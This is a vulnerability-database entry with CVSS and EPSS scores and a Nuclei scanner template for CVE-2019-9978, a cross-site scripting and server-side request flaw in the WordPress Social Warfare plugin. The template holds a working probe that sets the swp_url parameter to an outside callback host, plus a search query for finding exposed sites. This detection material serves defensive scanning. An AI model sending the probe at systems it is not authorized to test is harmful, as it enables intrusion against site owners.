Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-9978
HistoryAug 12, 2020 - 3:05 p.m.

WordPress Social Warfare <3.5.3 - Cross-Site Scripting

2020-08-1215:05:52
ProjectDiscovery
github.com
3

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.971 High

EPSS

Percentile

99.8%

WordPress Social Warfare plugin before 3.5.3 contains a cross-site scripting vulnerability via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, affecting Social Warfare and Social Warfare Pro.

id: CVE-2019-9978

info:
  name: WordPress Social Warfare <3.5.3 - Cross-Site Scripting
  author: madrobot,dwisiswant0
  severity: medium
  description: WordPress Social Warfare plugin before 3.5.3 contains a cross-site scripting vulnerability via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, affecting Social Warfare and Social Warfare Pro.
  remediation: |
    Update the Social Warfare plugin to version 3.5.3 or later to mitigate the vulnerability.
  reference:
    - https://github.com/mpgn/CVE-2019-9978
    - https://www.wordfence.com/blog/2019/03/unpatched-zero-day-vulnerability-in-social-warfare-plugin-exploited-in-the-wild/
    - https://www.pluginvulnerabilities.com/2019/03/21/full-disclosure-of-settings-change-persistent-cross-site-scripting-xss-vulnerability-in-social-warfare/
    - https://www.cybersecurity-help.cz/vdb/SB2019032105
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9978
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-9978
    cwe-id: CWE-79
    epss-score: 0.97235
    epss-percentile: 0.99828
    cpe: cpe:2.3:a:warfareplugins:social_warfare:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: warfareplugins
    product: social_warfare
    framework: wordpress
    fofa-query: body="social-warfare" && body="wp-"
  tags: cve,cve2019,wordpress,wp-plugin,ssrf,kev,warfareplugins,xss
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/social-warfare/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Social Warfare'

  - raw:
      - |
        GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4b0a00483046022100fa1828642d09d44a04671f382e1b44fea1e37d5977fe7829c84f1935ff55b28402210096124a6876470d4d02bdeb1fa0cf5c9ad2d69e3f12c139ae5cf7b49b532d1a93:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.971 High

EPSS

Percentile

99.8%